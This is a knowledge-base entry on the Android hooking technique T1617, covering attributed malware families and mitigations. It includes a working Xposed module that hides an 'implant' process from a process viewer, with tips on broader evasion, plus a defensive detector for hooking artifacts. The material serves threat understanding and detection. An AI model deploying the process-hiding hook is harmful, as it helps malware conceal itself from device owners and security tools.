T1617 Hooking
Adversaries may use hooking to hide artifacts associated with their activity and evade detection. Hooking intercepts system API and function calls and modifies their return values or the data structures they operate on. On Android this typically relies on a third-party root framework such as Xposed or Magisk, installed either through a system exploit or with pre-existing root access. By loading custom modules into such a framework, adversaries can hook system APIs and rewrite return values and/or system data structures, changing the behavior or visibility of various parts of the system (for example, which processes or packages appear to be present).
| Item | Value |
|---|---|
| ID | T1617 |
| Sub-techniques | |
| Tactics | TA0030 (Defense Evasion) |
| Platforms | Android |
| Version | 1.0 |
| Created | 24 September 2021 |
| Last Modified | 24 October 2025 |
Procedure Examples
| ID | Name | Description |
|---|---|---|
| S1208 | FjordPhantom | FjordPhantom has used a hooking framework in a variety of ways, including returning false information to detection mechanisms, pretending that Google Play Services are unavailable, and manipulating UI functionality. [3] |
| S1231 | GodFather | GodFather has used the Xposed hooking framework to intercept HTTP requests and responses, capturing and exfiltrating sensitive information such as credentials. [2] |
| S0407 | Monokle | Monokle can hook itself to appear invisible to the Process Manager. [1] |
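The mechanism described in the technique summary, and the specific effect attributed to Monokle (hiding its own process from a process manager), can be shown with a small Xposed module. The code below is an added example, not code from ATT&CK or from any of the malware families listed; the module package name, the target app name and the process name to hide are assumptions chosen for illustration. It hooks `ActivityManager.getRunningAppProcesses()` inside one target app's process and removes a chosen entry from the list before the caller sees it.

```java
// Added example (not ATT&CK's or Monokle's code). Package, target app and
// hidden process name are assumptions for illustration only.
package com.example.hookdemo;

import java.util.ArrayList;
import java.util.List;

import android.app.ActivityManager;

import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class HideProcessHook implements IXposedHookLoadPackage {
    // Process name to remove from enumeration results (assumption).
    private static final String HIDDEN_PROCESS = "com.example.implant";
    // Only tamper inside this app's process, a hypothetical process viewer;
    // every other process on the device is left unhooked to limit exposure.
    private static final String TARGET_APP = "com.example.taskmanager";

    @Override
    public void handleLoadPackage(LoadPackageParam lpparam) throws Throwable {
        if (!TARGET_APP.equals(lpparam.packageName)) {
            return;
        }

        // Resolve the method by class and name; the trailing vararg is the callback.
        XposedHelpers.findAndHookMethod(ActivityManager.class, "getRunningAppProcesses",
                new XC_MethodHook() {
                    @Override
                    protected void afterHookedMethod(MethodHookParam param) throws Throwable {
                        // The real method has already run; its return value sits in param.
                        @SuppressWarnings("unchecked")
                        List<ActivityManager.RunningAppProcessInfo> original =
                                (List<ActivityManager.RunningAppProcessInfo>) param.getResult();
                        if (original == null) {
                            return;
                        }
                        // Build a filtered copy instead of mutating the framework's list.
                        List<ActivityManager.RunningAppProcessInfo> filtered =
                                new ArrayList<>(original.size());
                        for (ActivityManager.RunningAppProcessInfo info : original) {
                            if (!HIDDEN_PROCESS.equals(info.processName)) {
                                filtered.add(info);
                            }
                        }
                        // The caller now receives the list with the implant removed.
                        param.setResult(filtered);
                    }
                });
        XposedBridge.log("hookdemo: hooked getRunningAppProcesses in " + lpparam.packageName);
    }
}
```

To load, the module's manifest declares the `xposedmodule` meta-data and `assets/xposed_init` lists the fully qualified class name; the framework then calls `handleLoadPackage` in every app process as it starts. Two practical caveats: on recent Android releases `getRunningAppProcesses()` returns only the caller's own processes to unprivileged apps, so a real implant would hook the other enumeration paths (package listing, `/proc` reads, accessibility or UI queries) as well, which is exactly why the procedure examples above describe hooks on detection checks and UI rather than on a single API; and because the hook runs in the victim app's process, anything that app can observe about its own runtime (loaded libraries, call stacks) becomes an indicator, which is the basis for the detection approach under Mitigations.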
Mitigations
| ID | Mitigation | Description |
|---|---|---|
| M1002 | Attestation | Device attestation can often detect rooted devices. |
| M1010 | Deploy Compromised Device Detection Method | Mobile security products can often detect rooted devices. |
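The two mitigations rely on spotting the root framework rather than the individual hook. One signal a mobile security product or a hardened app can collect on-device is the residue a hooking framework leaves in the instrumented process. The class below is an added example, not ATT&CK's or any vendor's code; the marker strings are assumptions based on how Xposed-family frameworks and Frida typically appear in a process's memory map and call stack, and a real deployment would keep its own list current.

```java
// Added example (not ATT&CK's or a vendor's code). Indicator strings are
// assumptions for illustration; tune them for the frameworks you care about.
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

public final class HookingIndicators {
    // Library / jar names that show up in /proc/self/maps once a framework is injected.
    private static final String[] MAP_MARKERS = {
        "XposedBridge.jar", "libxposed_art.so", "lsposed", "libriru", "frida-agent", "libfrida"
    };
    // Class-name prefixes that appear on the call stack while a method is hooked.
    private static final String[] STACK_PREFIXES = {
        "de.robv.android.xposed.", "org.lsposed."
    };
    // Present in the process only if Xposed (or a compatible fork) injected itself.
    private static final String XPOSED_BRIDGE = "de.robv.android.xposed.XposedBridge";

    private HookingIndicators() {}

    /** Collects human-readable findings; an empty list means nothing was observed. */
    public static List<String> collect() {
        List<String> findings = new ArrayList<>();
        findings.addAll(scanStack(new Throwable().getStackTrace()));
        findings.addAll(scanMaps("/proc/self/maps"));
        if (xposedClassPresent()) {
            findings.add("class " + XPOSED_BRIDGE + " is loadable in this process");
        }
        return findings;
    }

    static List<String> scanStack(StackTraceElement[] frames) {
        List<String> hits = new ArrayList<>();
        for (StackTraceElement frame : frames) {
            for (String prefix : STACK_PREFIXES) {
                if (frame.getClassName().startsWith(prefix)) {
                    hits.add("hooking frame on call stack: " + frame.getClassName());
                    break;
                }
            }
        }
        return hits;
    }

    static List<String> scanMaps(String mapsPath) {
        List<String> hits = new ArrayList<>();
        try (BufferedReader in = new BufferedReader(new FileReader(mapsPath))) {
            String line;
            while ((line = in.readLine()) != null) {
                for (String marker : MAP_MARKERS) {
                    if (line.contains(marker)) {
                        hits.add("mapped artifact: " + line.trim());
                        break;
                    }
                }
            }
        } catch (IOException e) {
            // An unreadable maps file is itself unusual; report it rather than swallow it.
            hits.add("could not read " + mapsPath + ": " + e.getMessage());
        }
        return hits;
    }

    static boolean xposedClassPresent() {
        try {
            Class.forName(XPOSED_BRIDGE);
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }
}
```

Treat the result as one input to a risk decision, not as a verdict: an adversary with the hooking capability this page describes can hook `Throwable.getStackTrace`, filter the bytes read from `/proc/self/maps`, or make `Class.forName` throw, which is exactly the "returning false information to detection mechanisms" behavior attributed to FjordPhantom above. That is why M1002 points to device attestation: an attestation result verified off the device is not subject to in-process hooking in the way these local checks are.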
References
1. Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.
2. Ortega, F., Pratapagiri, V. (2025, June 18). Your Mobile App, Their Playground: The Dark Side of Virtualization. Retrieved July 16, 2025.
3. Promon Security Research Team. (2024, October 1). Retrieved February 19, 2025.